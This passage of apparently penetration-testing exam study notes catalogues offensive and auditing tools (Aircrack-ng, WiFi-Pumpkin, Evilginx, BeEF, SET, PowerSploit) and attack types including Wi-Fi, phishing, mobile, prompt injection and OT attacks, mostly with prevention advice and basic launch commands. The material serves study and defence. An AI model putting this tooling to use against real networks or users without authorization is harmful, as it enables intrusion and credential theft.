CIS Benchmark: Aligns with the CIS Docker Benchmark recommendations.
Detailed Reports: Provides detailed reports on the findings and recommendations.
Automated and Manual Use: Can be run manually or integrated into automated security workflows.
Use Case: Checking Docker configurations against security best practices.
Example: Ensuring Docker daemon configuration is secure, container settings are appropriate, and security options are enabled.
Prevention: Run Docker Bench regularly to ensure Docker containers are configured securely.
Usage → sh docker-bench-security.sh
Kube-hunter
Purpose: Kubernetes security auditing tool.
Kube-hunter is an open-source tool designed to perform security assessments on Kubernetes clusters.
It identifies potential security issues and vulnerabilities in Kubernetes environments, helping administrators and security professionals secure their clusters.
Features:
Automated Scanning: Automatically scans Kubernetes clusters for security vulnerabilities.
Extensive Coverage: Checks for a wide range of security issues, including misconfigurations and exposed services.
Detailed Reports: Provides detailed reports on discovered vulnerabilities and potential security issues.
Interactive and Network Scanning: Supports both interactive (direct access) and network scanning modes.
Use Case: Scanning Kubernetes clusters for security issues and misconfigurations.
Example: Identifying open ports, insecure configurations, and vulnerabilities in a Kubernetes environment.
Prevention: Use Kube-hunter to regularly scan Kubernetes clusters and address identified issues to enhance cluster security.
Usage:
Scans the network for Kubernetes clusters → kube-hunter --remote <TARGET_IP>
Prowler
Purpose: AWS security best practices assessment tool.
Prowler is an open-source tool designed to perform security best practices assessments, audits, incident response, continuous monitoring, and compliance checks on AWS environments.
It helps ensure that your AWS accounts adhere to the best practices and compliance standards set by organizations like the Center for Internet Security (CIS), General Data Protection Regulation (GDPR), and others.
Key Features:
Security Assessments: Conducts security best practices assessments based on AWS CIS Benchmark.
Compliance Checks: Includes checks for GDPR, HIPAA, ISO 27001, and more.
Automated and Manual Use: Can be used interactively or integrated into CI/CD pipelines.
Detailed Reporting: Generates detailed reports with findings and recommendations.
Use Case: Auditing AWS accounts for security best practices and compliance.
Example: Checking IAM policies, S3 bucket configurations, CloudTrail logs, and other AWS resources.
Prevention: Implement Prowler to continuously monitor AWS environments for security compliance and best practices.
ScoutSuite is an open-source multi-cloud security-auditing tool that helps assess the security posture of cloud environments.
It supports AWS, Azure, Google Cloud Platform (GCP), and other cloud providers.
ScoutSuite uses the cloud providers' APIs to gather configuration data and then analyzes the information to provide a comprehensive report on security issues and best practices.
Features:
Multi-Cloud Support: Audits AWS, Azure, GCP, and other cloud environments.
Comprehensive Reporting: Generates detailed reports highlighting security issues and recommendations.
Easy to Use: Simple CLI interface for easy execution.
Customizable: Allows customization of checks and reporting.
Interactive Reports: Produces interactive HTML reports for better visualization of findings.
Use Case: Assessing the security posture of cloud environments such as AWS, Azure, and Google Cloud.
Example: Identifying misconfigurations, insecure policies, and other security risks across different cloud platforms.
Prevention: Utilize ScoutSuite to perform regular security audits across multi-cloud environments and remediate identified risks.
Usage:
Scanning an AWS Environment → scoutsuite aws --profile <AWS_PROFILE>
Scanning an Azure Environment → scoutsuite azure --subscription <SUBSCRIPTION_ID>
Purpose: Tools provided by cloud vendors for security assessment and monitoring.
Cloud-native vendor tools are provided by cloud service providers like AWS, Azure, and Google Cloud Platform (GCP) to help users manage, monitor, and secure their cloud environments.
These tools are designed to work seamlessly with their respective cloud platforms, providing deep integration and extensive features.
Use Case: Utilizing built-in cloud services for security management and compliance.
Examples:
AWS Security Hub: Centralized security management for AWS.
Azure Security Center: Unified security management and advanced threat protection.
Google Cloud Security Command Center: Security and risk management for Google Cloud resources.
Prevention: Leverage these cloud-native tools to continuously monitor and improve the security posture of cloud environments, ensuring compliance and detecting potential threats.
Objective 4.7
Wardriving
Definition: Searching for Wi-Fi networks by driving around with a device that detects wireless networks.
Purpose: Identifying vulnerable Wi-Fi networks for potential exploitation.
Example: Using a laptop with Wi-Fi scanning software to map out available networks in a neighborhood.
Prevention: Secure Wi-Fi networks with strong encryption (WPA3), hide SSIDs, and limit signal range.
Evil Twin Attack
Definition: Setting up a rogue Wi-Fi access point that mimics a legitimate one to intercept data.
Purpose: Stealing sensitive information by tricking users into connecting to the rogue network.
Example: An attacker creates a Wi-Fi network named "CoffeeShopWiFi" to lure customers of a nearby coffee shop.
Prevention: Educate users to verify Wi-Fi network names, use VPNs, and enable mutual authentication.
Signal Jamming
Definition: Disrupting wireless communications by overwhelming the network with interference signals.
Purpose: Denying access to legitimate users by causing network disruption.
Example: Using a signal jammer to disrupt Wi-Fi connectivity in a specific area.
Prevention: Implementing spread spectrum technologies, using robust wireless protocols, and securing physical locations.
Protocol Fuzzing
Definition: Sending malformed or unexpected data to a network protocol to discover vulnerabilities.
Purpose: Identifying security flaws in network protocols that can be exploited.
Example: Sending random data to a Bluetooth protocol to find buffer overflow vulnerabilities.
Prevention: Regularly update and patch protocols, use secure coding practices, and employ robust error handling.
Packet Crafting
Definition: Creating custom network packets to test the behavior of network devices or protocols.
Purpose: Identifying weaknesses in how devices handle unusual or malicious packets.
Example: Using tools like Scapy to send specially crafted TCP packets to a firewall.
Prevention: Apply network hardening techniques, use intrusion detection systems (IDS), and regularly audit network configurations.
Deauthentication
Definition: Forcing devices to disconnect from a Wi-Fi network by sending deauthentication frames.
Purpose: Disrupting user connections to capture re-authentication data or cause denial of service.
Example: Using a deauthentication tool to force devices off a network, making them reconnect to a rogue access point.
Prevention: Use WPA3, implement management frame protection (802.11w), and monitor for unusual disconnections.
Captive Portal
Definition: Intercepting and redirecting user traffic to a login page before granting internet access.
Purpose: Often used legitimately in public Wi-Fi to control access, but can be exploited for phishing.
Example: A hotel uses a captive portal to require guest login for Wi-Fi access, but an attacker could create a fake portal to steal credentials.
Prevention: Use HTTPS on captive portals, educate users about phishing risks, and implement secure authentication methods.
Wi-Fi Protected Setup (WPS) Personal Identification Number (PIN) Attack
Definition: Exploiting vulnerabilities in the WPS PIN feature to gain access to a Wi-Fi network.
Purpose: Bypassing WPA/WPA2 security by brute-forcing the WPS PIN.
Example: Using tools like Reaver to attempt various PIN combinations on a WPS-enabled router.
Prevention: Disable WPS on routers, use strong WPA3 encryption, and ensure routers are up to date with security patches.
Tools
WPAD (Web Proxy Auto-Discovery Protocol)
Purpose: Automates the discovery of web proxy configuration files
The Web Proxy Auto-Discovery Protocol (WPAD) is a protocol used by clients to automatically locate a proxy configuration file, typically called wpad.dat, which provides the settings needed to connect to the internet through a proxy server.
This protocol helps in managing proxy settings across a large network and simplifies the configuration process for end-users.
Features:
Automatic Proxy Configuration: Allows clients to automatically discover and configure the appropriate proxy settings without manual intervention.
Ease of Management: Simplifies the management of proxy settings across a network by centralizing the configuration.
Support for Multiple Platforms: Works with various operating systems and web browsers that support automatic proxy configuration.
Use Case: Can be used maliciously to redirect traffic through a malicious proxy.
Example: Attacker sets up a rogue WPAD server to intercept and monitor web traffic.
Prevention: Disable WPAD in network settings and enforce the use of secure proxies.
WiFi-Pumpkin
Purpose: Framework for rogue access point attacks.
WiFi-Pumpkin is an open-source framework for conducting wireless network security assessments and attacks.
It is designed to facilitate various wireless network attacks, such as creating rogue access points, performing man-in-the-middle (MITM) attacks, and capturing network traffic.
WiFi-Pumpkin provides a user-friendly interface and powerful tools for network penetration testing and auditing.
Features:
Rogue Access Point Creation: Allows the creation of fake access points to lure unsuspecting users.
Man-in-the-Middle (MITM) Attacks: Facilitates intercepting and manipulating network traffic.
Network Traffic Analysis: Captures and analyzes network packets.
Credential Harvesting: Captures login credentials from victims connecting to the rogue access point.
Plugins and Extensions: Supports various plugins for extending functionality.
User-Friendly Interface: Provides a graphical user interface (GUI) for ease of use.
Use Case: Creating fake access points to capture user credentials and data.
Example: Setting up a fake hotspot named "Free WiFi" to lure users and intercept their data.
Prevention: Educate users to avoid suspicious Wi-Fi networks, use VPNs, and implement secure Wi-Fi settings.
Usage → python3 wifi-pumpkin.py
Aircrack-ng
Purpose: Suite of tools for assessing Wi-Fi network security.
Aircrack-ng is a suite of tools designed for analyzing and cracking WEP and WPA/WPA2 wireless network security.
It is widely used by security professionals and enthusiasts for testing the security of wireless networks.
Aircrack-ng is powerful for conducting various types of wireless network attacks, including packet sniffing, decryption, and cracking encryption keys.
Features:
Packet Capture: Captures and analyzes packets from wireless networks.
Cracking Encryption: Cracks WEP and WPA/WPA2 encryption keys using captured packets.
Injection: Supports packet injection for attacking and testing networks.
Monitoring: Monitors and analyzes wireless traffic.
Compatibility: Works with various wireless adapters that support monitoring and injection.
Components:
airmon-ng: A tool to enable monitor mode on wireless interfaces.
airodump-ng: Captures packets from wireless networks.
aireplay-ng: Injects packets into the network for various attacks.
aircrack-ng: Cracks WEP and WPA/WPA2 encryption keys using captured packets.
airbase-ng: Creates fake access points.
airtun-ng: Creates virtual network interfaces.
packetforge-ng: Creates custom packets for injection.
Use Case: Cracking WEP and WPA-PSK keys to gain unauthorized access to Wi-Fi networks.
Example: Using Aircrack-ng to capture packets and crack the encryption key of a nearby Wi-Fi network.
Prevention: Use strong WPA3 encryption, complex passwords, and regularly update network security settings.
WiGLE.net
Purpose: Database of Wi-Fi networks globally, mapped by geographic location.
WiGLE.net (Wireless Geographic Logging Engine) is a web-based service that provides a platform for mapping and analyzing wireless networks worldwide.
It collects and aggregates data from users who log wireless network information, including Wi-Fi access points, their locations, and other relevant details.
WiGLE.net is commonly used for discovering the geographic distribution of Wi-Fi networks and for research purposes related to wireless network security and geolocation.
Features:
Wireless Network Mapping: Visualizes the location and distribution of Wi-Fi access points on a map.
Data Collection: Aggregates data from users who submit wireless network information.
Search and Filtering: Allows users to search for specific networks and filter results based on various criteria.
AP Data: Provides detailed information about access points, including SSID, MAC address, and encryption type.
Download Data: Users can download collected data for offline analysis.
Use Case: Finding and analyzing the distribution of Wi-Fi networks.
Example: Searching for Wi-Fi networks in a specific area to find vulnerable networks.
Prevention: Secure Wi-Fi networks with strong encryption and avoid broadcasting SSIDs in public places.
InSSIDer
Purpose: Wi-Fi network scanner.
InSSIDer is a wireless network scanner and analyzer tool developed by MetaGeek.
It is designed to help users analyze and troubleshoot wireless networks by providing detailed information about Wi-Fi access points and network performance.
InSSIDer is commonly used by network administrators, security professionals, and enthusiasts to optimize wireless network performance and diagnose connectivity issues.
Features:
Network Discovery: Scans and lists available Wi-Fi networks, displaying detailed information about each network.
Signal Strength: Provides real-time signal strength readings to help identify weak or strong signals.
Channel Analysis: Analyzes and visualizes channel usage to identify congestion and optimize channel selection.
Interference Detection: Identifies potential sources of interference and helps in mitigating issues.
Historical Data: Tracks and displays historical data on network performance for trend analysis.
Network Visualization: Displays networks on a graph to visualize signal strength, channel usage, and network distribution.
Use Case: Analyzing Wi-Fi networks to optimize performance and security.
Example: Identifying overlapping channels and signal strength issues in a home or office network.
Prevention: Regularly scan and optimize Wi-Fi networks to ensure optimal security and performance.
Kismet
Purpose: Wireless network detector, sniffer, and intrusion detection system.
Kismet is an open-source wireless network detector, sniffer, and intrusion detection system.
It is designed to capture and analyze wireless network traffic, making it a valuable tool for network administrators, security professionals, and enthusiasts.
Kismet supports a wide range of wireless devices and can be used to detect and investigate wireless network security issues, including unauthorized access points and client devices.
Features:
Wireless Network Detection: Identifies and maps wireless networks, including hidden networks.
Packet Capture: Captures and logs wireless packets for analysis.
Network Visualization: Provides detailed visualization of network traffic and device locations.
Intrusion Detection: Detects unauthorized access points and potential security threats.
Multi-Interface Support: Supports multiple wireless interfaces for comprehensive monitoring.
Plugin Support: Extensible with various plugins for additional functionality.
Use Case: Monitoring wireless traffic and detecting unauthorized access points.
Example: Using Kismet to detect rogue access points and suspicious activity in a corporate network.
Prevention: Implement continuous monitoring with tools like Kismet to identify and mitigate unauthorized wireless activity.
Usage → sudo kismet
Objective 4.8
Attack Types
Phishing
Definition: Deceptive emails designed to trick recipients into divulging sensitive information.
Example: An email pretending to be from a bank asking for account verification.
Prevention: Use email filters, educate users on recognizing phishing attempts, and implement multi-factor authentication.
Vishing
Definition: Voice phishing, where attackers use phone calls to deceive victims.
Example: A scammer posing as tech support to gain remote access to a victim’s computer.
Prevention: Educate users to verify caller identities and avoid sharing sensitive information over the phone.
Whaling
Definition: Targeted phishing aimed at high-profile individuals within an organization.
Example: A fake email from a CEO asking the CFO for a wire transfer.
Prevention: Train executives on cybersecurity awareness and implement strict verification processes for sensitive requests.
Spear Phishing
Definition: Highly targeted phishing aimed at specific individuals or organizations.
Example: An email tailored to an employee, appearing to come from a trusted colleague, containing a malicious attachment.
Prevention: Regular cybersecurity training and awareness, use of email authentication protocols.
Smishing
Definition: SMS phishing, where attackers send deceptive text messages.
Example: A text message claiming to be from a delivery service with a malicious link.
Prevention: Educate users to be cautious of unsolicited texts and avoid clicking on unknown links.
Dumpster Diving
Definition: Searching through trash to find sensitive information.
Example: Finding discarded documents with personal information in a company’s dumpster.
Prevention: Shred all sensitive documents before disposal and secure trash bins.
Surveillance
Definition: Monitoring individuals or locations to gather information.
Example: Observing the layout and security measures of a target building.
Prevention: Use surveillance detection measures and ensure physical security protocols are followed.
Shoulder Surfing
Definition: Observing someone’s private information over their shoulder.
Example: Watching someone enter their password at an ATM.
Prevention: Use privacy screens, be aware of surroundings, and shield inputs when entering sensitive information.
Tailgating
Definition: Gaining unauthorized access by following someone into a restricted area.
Example: An attacker following an employee through a secure door without using a badge.
Prevention: Implement strict access control measures and train employees to not allow tailgating.
Eavesdropping
Definition: Listening in on private conversations to gather information.
Example: Overhearing confidential discussions in a public place.
Prevention: Use private areas for sensitive conversations and employ sound masking technologies.
Watering Hole
Definition: Compromising a website frequented by a target group to distribute malware.
Example: Injecting malicious code into a popular industry forum visited by target employees.
Prevention: Monitor and secure frequently visited sites and use web filtering tools.
Impersonation
Definition: Pretending to be someone else to gain access or information.
Example: An attacker posing as a maintenance worker to gain physical access to a building.
Prevention: Verify identities of unknown individuals and enforce strict visitor policies.
Credential Harvesting
Definition: Collecting usernames and passwords through deceptive means.
Example: A fake login page capturing credentials of users attempting to sign in.
Prevention: Use secure login mechanisms, educate users on recognizing phishing sites, and implement multi-factor authentication.
Tools
Social Engineering Toolkit (SET)
Purpose: Framework for social engineering penetration tests.
Social Engineering Toolkit (SET) is an open-source framework designed for social engineering attacks.
Developed by TrustedSec, SET is a popular tool used by penetration testers and security professionals to simulate social engineering attacks and assess the effectiveness of security awareness training.
SET provides a variety of attack vectors and techniques, allowing users to craft and execute sophisticated social engineering campaigns.
Features:
Phishing Attacks: Create and deploy phishing emails, websites, and malicious attachments.
Credential Harvesting: Capture login credentials through fake login pages and credential harvesters.
Exploit Delivery: Deliver exploits and payloads using social engineering techniques.
Payload Generation: Generate malicious payloads and executables for various platforms.
Pre-Built Templates: Use pre-configured attack templates for common social engineering scenarios.
Integration: Integrates with Metasploit and other tools for advanced attack capabilities.
Use Case: Creating phishing campaigns and other social engineering attacks.
Example: Simulating a phishing email to test an organization’s security awareness.
Usage: This command starts the SET framework and presents an interactive menu. → sudo setoolkit
Gophish
Purpose: Phishing simulation tool.
Gophish is an open-source phishing framework designed for creating, managing, and analyzing phishing campaigns.
It allows security professionals and researchers to simulate phishing attacks to assess the effectiveness of security training and identify vulnerabilities in organizations.
Gophish provides a user-friendly interface for setting up phishing campaigns, tracking results, and analyzing the success of various phishing tactics.
Features:
Campaign Management: Create, manage, and track phishing campaigns with ease.
Template Creation: Design and customize phishing emails and landing pages.
Tracking and Analytics: Monitor user interactions with phishing emails and landing pages, including clicks and form submissions.
Reporting: Generate detailed reports on campaign performance and user responses.
Multi-User Support: Allow multiple users to manage and run campaigns with different access levels.
Use Case: Creating and managing phishing campaigns to test user susceptibility.
Example: Sending simulated phishing emails to employees to gauge their response.
Usage: By default, Gophish will start and listen on port 3333 for the web interface and port 8080 for the API. → ./gophish
Evilginx
Purpose: Advanced phishing tool.
Evilginx is an open-source phishing framework designed to perform advanced phishing attacks using reverse proxy techniques.
It is specifically used for bypassing two-factor authentication (2FA) protections by intercepting authentication tokens and session cookies.
Evilginx allows attackers to create realistic phishing sites that can capture credentials and session tokens, providing access to protected accounts even if 2FA is enabled.
Features:
Reverse Proxy: Acts as a man-in-the-middle to intercept and relay requests between the victim and the legitimate service.
2FA Bypass: Captures session cookies and authentication tokens to bypass two-factor authentication.
Customizable Phishing Pages: Allows the creation of phishing pages that mimic legitimate login interfaces.
Credential and Token Harvesting: Captures usernames, passwords, and session tokens.
Real-Time Logging: Provides real-time logs of captured credentials and tokens.
Use Case: Performing man-in-the-middle attacks to capture credentials.
Example: Setting up a proxy to intercept login credentials from a phishing site.
theHarvester
Purpose: Information gathering tool.
theHarvester is an open-source information-gathering tool designed for reconnaissance and information retrieval during security assessments.
It is used to collect email addresses, domain names, and other relevant information from various public sources and databases.
This information can be valuable for understanding the target organization and identifying potential attack vectors.
Features:
Email Collection: Harvest email addresses from different sources such as search engines and social media.
Domain Enumeration: Discover domain names and subdomains associated with a target organization.
Public Information Gathering: Collect information from public sources like search engines, social networks, and DNS records.
Multiple Data Sources: Utilizes various APIs and search engines to gather information.
Use Case: Collecting emails, names, and other information from public sources.
Example: Gathering information on a target organization from search engines and social networks.
Usage → python3 theHarvester.py -d example.com -b google
Purpose: Data mining tool for link analysis and information gathering.
Maltego is a powerful open-source intelligence (OSINT) and graphical link analysis tool designed for conducting comprehensive reconnaissance and analysis.
It is widely used in cybersecurity, investigations, and intelligence gathering to discover relationships and patterns between various entities such as people, organizations, domains, and IP addresses.
Maltego offers a visual interface that allows users to map out and analyze complex networks of information.
Features:
Graphical Link Analysis: Visualize and analyze relationships between different data points.
Transformations: Use built-in and custom transformations to gather data from various sources.
Data Integration: Integrate data from different sources, including DNS records, social networks, and WHOIS information.
Customizable: Create and use custom transformations and data sources.
Collaboration: Share and collaborate on investigative graphs with team members.
Use Case: Mapping relationships and gathering detailed information on targets.
Example: Visualizing the connections between individuals within an organization.
Recon-ng
Purpose: Web reconnaissance framework.
Recon-ng is an open-source reconnaissance framework designed for gathering information during the reconnaissance phase of security assessments.
It provides a modular and flexible environment for performing OSINT (Open Source Intelligence) to collect and analyze data from various public sources.
Recon-ng is particularly useful for security professionals and penetration testers looking to automate and streamline the information-gathering process.
Features:
Modular Framework: Consists of various modules for different types of reconnaissance, including domain information, email addresses, and more.
API Integration: Supports numerous APIs for data collection from public and commercial sources.
Customizable: Allows users to create and use custom modules and scripts.
Automated Data Collection: Automates the process of querying and collecting data from multiple sources.
Interactive Console: Provides an interactive command-line interface for easy navigation and operation.
Use Case: Performing automated reconnaissance on targets.
Example: Gathering domain and contact information about a target organization.
Usage → python3 recon-ng
Browser Exploitation Framework (BeEF)
Purpose: Browser exploitation tool.
BeEF (Browser Exploitation Framework) is a penetration testing tool designed to assess the security of web browsers.
BeEF focuses on leveraging browser vulnerabilities and misconfigurations to gain access to the client-side environment.
It allows security professionals to demonstrate and exploit weaknesses in browser security by taking control of web browsers through various attack vectors.
Features:
Client-Side Attacks: Exploits vulnerabilities and weaknesses in web browsers to gain control over the client-side environment.
Social Engineering: Uses social engineering techniques to deliver payloads and exploits.
Real-Time Interaction: Provides real-time interaction with compromised browsers through a web-based interface.
Extensive Modules: Includes a wide range of modules for different types of attacks, such as phishing, credential harvesting, and session hijacking.
Post-Exploitation: Allows for post-exploitation activities like capturing screenshots, keylogging, and more.
Use Case: Using browser vulnerabilities to gather information or deliver payloads.
Example: Hooking a target’s browser to control it and deliver exploits.
Usage: → - ./beef
Objective 4.9
Attack Types
Mobile Attacks
Information Disclosure
Definition: Unauthorized access or exposure of sensitive information.
Example: A malicious app accessing and leaking user data without permission.
Prevention: Implement strong access controls and use encryption for sensitive data.
Jailbreak/Rooting
Definition: Gaining root access to a device to bypass security restrictions.
Example: Using a jailbreaking tool to install unauthorized apps on an iPhone.
Prevention: Regularly update OS, use mobile device management (MDM) solutions to detect and block jailbroken/rooted devices.
Permission Abuse
Definition: Apps requesting and misusing excessive permissions.
Example: A flashlight app requesting access to contacts and SMS.
Prevention: Educate users on reviewing app permissions, use app reputation services to detect malicious apps.
AI Attacks
Prompt Injection
Definition: Manipulating input prompts to deceive AI models.
Example: Crafting inputs to cause an AI chatbot to provide incorrect or harmful responses.
Prevention: Implement input validation and filtering, train AI models to handle unexpected inputs safely.
Model Manipulation
Definition: Altering the AI model to produce unintended behavior.
Example: Poisoning the training data to bias the model’s outputs.
Prevention: Secure training data, validate model integrity regularly.
OT
Register Manipulation
Definition: Altering the values in the control registers of an OT system to manipulate its behavior.
Example: Changing the temperature set point in a thermostat to cause overheating.
Prevention: Implement access controls, monitor and log register changes, use secure protocols.
CAN Bus Attack
Definition: Exploiting vulnerabilities in the Controller Area Network (CAN) bus used in vehicles and industrial systems.
Example: Sending malicious commands to control vehicle functions such as braking or acceleration.
Prevention: Implement authentication and encryption for CAN bus communications, use intrusion detection systems.
Modbus Attack
Definition: Targeting the Modbus protocol, widely used in industrial systems, to intercept or alter commands.
Example: Intercepting Modbus traffic to alter commands sent to a programmable logic controller (PLC).
Prevention: Use secure versions of Modbus, implement network segmentation and encryption.
Plaintext Attack
Definition: Attacking unencrypted data transmissions in OT environments to intercept sensitive information.
Example: Capturing unencrypted commands sent to industrial control systems (ICS).
Prevention: Use encryption protocols like TLS/SSL for data in transit, implement network security measures.
Replay Attack
Definition: Reusing captured legitimate data transmissions to perform unauthorized actions in OT systems.
Example: Replaying captured commands to repeatedly turn on and off industrial machinery.
Prevention: Implement time-sensitive tokens, nonces, and session validation to invalidate reused transmissions.
Near-field Communication (NFC) Attacks
Definition: Exploiting NFC technology to gain unauthorized access or perform malicious actions.
Example: Skimming data from contactless payment cards.
Prevention: Use secure NFC protocols, enable NFC only when needed, use NFC shields.
Bluejacking
Definition: Sending unsolicited messages to Bluetooth-enabled devices.
Example: Sending spam messages to nearby Bluetooth devices.
Prevention: Keep Bluetooth disabled when not in use, set devices to non-discoverable mode.
Radio-frequency Identification (RFID) Attacks
Definition: Exploiting RFID technology to intercept or manipulate data.
Example: Cloning an RFID badge to gain unauthorized access to a building.
Prevention: Use encrypted RFID communications, implement physical security measures.
Bluetooth Spamming
Definition: Sending a large volume of unsolicited messages via Bluetooth.
Example: Overwhelming a Bluetooth device with spam messages to disrupt its operation.
Prevention: Disable Bluetooth when not in use, employ Bluetooth security features.
Tools
Scapy
Function: Packet manipulation tool.
Scapy is an open-source Python library used for packet manipulation and network analysis.
It allows users to create, send, receive, and analyze network packets with a high level of flexibility.
Scapy is often used in network penetration testing, security research, and network troubleshooting due to its powerful capabilities for crafting and analyzing packets.
Features:
Packet Crafting: Create custom packets with a wide range of protocols.
Packet Analysis: Analyze and dissect network packets.
Network Scanning: Perform network scanning and discovery.
Protocol Support: Supports a wide range of protocols, including Ethernet, IP, TCP, UDP, ICMP, and more.
Scripting: Write scripts to automate network tasks and analyses.
Use Case: Crafting and sending custom network packets for penetration testing.
Example: Performing packet crafting to test for vulnerabilities in the CAN bus or Modbus protocols.
tcprelay
Function: Proxy tool for relaying TCP connections.
tcprelay is a tool used to relay TCP traffic between two endpoints.
It is often used in network testing and troubleshooting to redirect TCP connections from one port to another or from one host to another.
It can be useful in scenarios where you need to forward traffic between systems or services, or when you want to redirect traffic for analysis or testing purposes.
Features:
TCP Traffic Forwarding: Relay TCP traffic from one port to another or between hosts.
Port Redirection: Redirect traffic from a local port to a remote port or vice versa.
Flexible Configuration: Configure different source and destination ports and addresses.
Simple Setup: Easy to set up and use for basic TCP traffic forwarding tasks.
Use Case: Forwarding traffic between different network interfaces for testing and debugging.
Example: Relaying traffic from an OT network to analyze and modify data in transit.
Function: Network protocol analyzer and packet capture tool.
Use Case: Capturing and analyzing network traffic.
Example: Monitoring CAN bus or Modbus traffic to detect malicious activity or replay attacks.
MobSF (Mobile Security Framework)
Function: Automated security analysis tool for mobile applications.
MobSF (Mobile Security Framework) is an open-source automated mobile application security testing tool designed to perform static and dynamic analysis of mobile applications.
It is widely used by security professionals and developers to identify vulnerabilities and security issues in mobile apps for both Android and iOS platforms.
Features:
Static Analysis: Analyzes the application's source code, binaries, and artifacts without executing the app.
Dynamic Analysis: Executes the application to identify runtime vulnerabilities and issues.
API Testing: Assesses the security of APIs used by the mobile application.
Malware Analysis: Detects potential malware or malicious behavior in mobile apps.
Reporting: Generates detailed reports on security findings, including recommendations for remediation.
Use Case: Static and dynamic analysis of Android and iOS apps.
Example: Analyzing mobile applications for information disclosure, permission abuse, or other security flaws.
Usage:python3 manage.py runserver
Frida
Function: Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.
Frida is a dynamic instrumentation toolkit used for reverse engineering and security research.
It allows users to inject code into running processes, enabling real-time analysis and manipulation of applications.
Frida is widely used for debugging, analyzing, and modifying applications on various platforms, including Android, iOS, Windows, and macOS.
Features:
Dynamic Instrumentation: Inject and execute custom scripts in real-time within a running process.
Cross-Platform Support: Works on Android, iOS, Windows, macOS, and Linux.
JavaScript API: Write scripts in JavaScript to interact with and modify processes.
API Hooking: Hook into native functions and APIs to monitor or alter their behavior.
Remote Support: Perform remote instrumentation on devices over the network.
Use Case: Injecting scripts into running processes for debugging and analysis.
Example: Manipulating mobile app behavior or intercepting and modifying OT system commands in real-time.
Drozer
Function: Comprehensive security audit and attack framework for Android.
Drozer is a comprehensive security assessment tool designed for Android applications.
It focuses on identifying and exploiting vulnerabilities in Android apps and the underlying Android operating system.
Drozer provides a suite of tools for performing security assessments, ranging from discovering vulnerabilities to exploiting them.
Features:
Application Scanning: Identify security issues in Android apps, including insecure components and permissions.
Dynamic Analysis: Analyze running applications to find vulnerabilities and exploit them in real-time.
Exploit Modules: Utilize pre-built modules to exploit known vulnerabilities in Android applications.
Custom Scripting: Write custom scripts to automate and extend Drozer’s capabilities.
Interactivity: Interact with Android applications and their components programmatically.
Use Case: Assessing the security of Android applications.
Example: Testing Android apps for vulnerabilities such as information disclosure or misuse of permissions.
Usage:drozer console connect
Android Debug Bridge (ADB)
Function: Command-line tool for interacting with Android devices.
Android Debug Bridge (ADB) is a versatile command-line tool that allows developers and security professionals to communicate with Android devices.
It provides various functionalities for debugging, managing, and controlling Android devices and emulators.
ADB is a key component of the Android SDK (Software Development Kit) and is widely used for development, troubleshooting, and testing.
Features:
Device Management: Interact with and manage Android devices and emulators.
Application Management: Install, uninstall, and manage applications on Android devices.
File Transfer: Transfer files between a computer and an Android device.
Debugging: Execute commands and scripts to debug applications and system components.
System Commands: Access and execute system commands on a connected device.
Use Case: Installing and debugging apps, accessing device logs, and executing shell commands.
Example: Using ADB to gain access to a rooted device for further analysis or exploitation.
Usage:adb start-server
Bluecrack
Function: Bluetooth security tool.
Bluecrack is a tool designed for attacking Bluetooth devices, specifically targeting Bluetooth devices using the Bluetooth Classic (BR/EDR) protocol.
It is primarily used to perform brute-force attacks on Bluetooth PINs to gain unauthorized access to Bluetooth devices.
Bluecrack aims to crack the PIN codes of Bluetooth devices, which can be crucial for security testing and penetration testing.
Features:
Brute-Force Attacks: Performs brute-force attacks on Bluetooth PINs.
PIN Cracking: Attempts to guess the PIN codes used for pairing Bluetooth devices.
Bluetooth Classic Support: Targets Bluetooth devices using Bluetooth Classic (BR/EDR).
Use Case: Testing Bluetooth devices for security weaknesses.
Example: Performing Bluetooth attacks such as Bluejacking or capturing Bluetooth communications.
Usage:bluecrack -i <interface> -a <target_address> -p <pin>
Objective 4.10
PowerShell
Empire/PowerSploit
Function: Post-exploitation framework.
Empire is a PowerShell and Python-based post-exploitation framework that enables red teaming and penetration testing. It provides a range of tools and modules for command-and-control, lateral movement, and data exfiltration.
Empire Features:
PowerShell and Python-Based: Utilizes both PowerShell and Python for various tasks.
Agent Management: Provides capabilities to manage and control multiple agents on compromised systems.
Command and Control: Offers a robust command and control infrastructure.
Post-Exploitation Modules: Includes a wide range of modules for tasks like credential harvesting, privilege escalation, and data exfiltration.
PowerSploit is a collection of PowerShell scripts and modules designed for use in penetration testing and red team operations. It focuses on exploiting and post-exploitation on Windows systems, leveraging PowerShell capabilities.
PowerSploit Features:
PowerShell-Based: Utilizes PowerShell for various post-exploitation and exploitation tasks.
Modular: Includes modules for a variety of tasks such as privilege escalation, credential dumping, and persistence.
Red Team Operations: Designed for red team engagements and penetration testing.
Example: Running PowerShell scripts to perform privilege escalation, credential dumping, and other attacks.
PowerView
Function: Network situational awareness tool.
PowerView is a PowerShell tool developed as part of the PowerSploit framework.
It is designed for enumerating and interacting with Active Directory (AD) environments.
PowerView is particularly useful for penetration testers and red teamers who need to gather information about AD environments, identify potential attack vectors, and perform various AD-related tasks.
Features:
AD Enumeration: Collect information about AD objects such as users, groups, and computers.
Kerberos and NTLM: Exploit AD authentication mechanisms to gather information and perform attacks.
Privilege Escalation: Identify potential privilege escalation paths and gather information for further exploitation.
LDAP Queries: Perform advanced LDAP queries to extract information from AD.
Domain Trusts: Discover and enumerate domain trusts to understand the AD forest structure.
Use Case: Automating the discovery and enumeration of Active Directory (AD) environments.
Example: Mapping out AD environments to identify high-value targets and potential attack paths.
PowerUpSQL
Function: SQL Server post-exploitation toolkit.
PowerUpSQL is a PowerShell tool designed to assess and exploit SQL Server instances.
It is used to identify and exploit vulnerabilities in SQL Server installations, primarily focusing on security assessments and privilege escalation.
PowerUpSQL is a valuable tool for penetration testers and red teamers who need to interact with SQL Server environments.
Features:
SQL Server Enumeration: Discover SQL Server instances, databases, and associated configurations.
Privilege Escalation: Identify potential privilege escalation paths and misconfigurations in SQL Server.
Exploit Vulnerabilities: Exploit known vulnerabilities and misconfigurations in SQL Server installations.
Configuration Checks: Check for common SQL Server misconfigurations that could be exploited.
Use Case: Automating SQL Server attacks.
Example: Identifying misconfigurations and vulnerabilities in SQL Server instances.
AD search
Function: Active Directory search and enumeration.
Active Directory (AD) Search refers to the process of querying and retrieving information from an Active Directory environment.
This can involve searching for objects such as users, groups, computers, and other entities within the AD domain.
Various tools and techniques can be used for AD search, ranging from built-in Windows utilities to specialized PowerShell scripts and third-party tools.
Use Case: Automating the search for AD objects and attributes.
Example: Extracting user and group information from AD to facilitate privilege escalation.
Bash
Input/Output Management
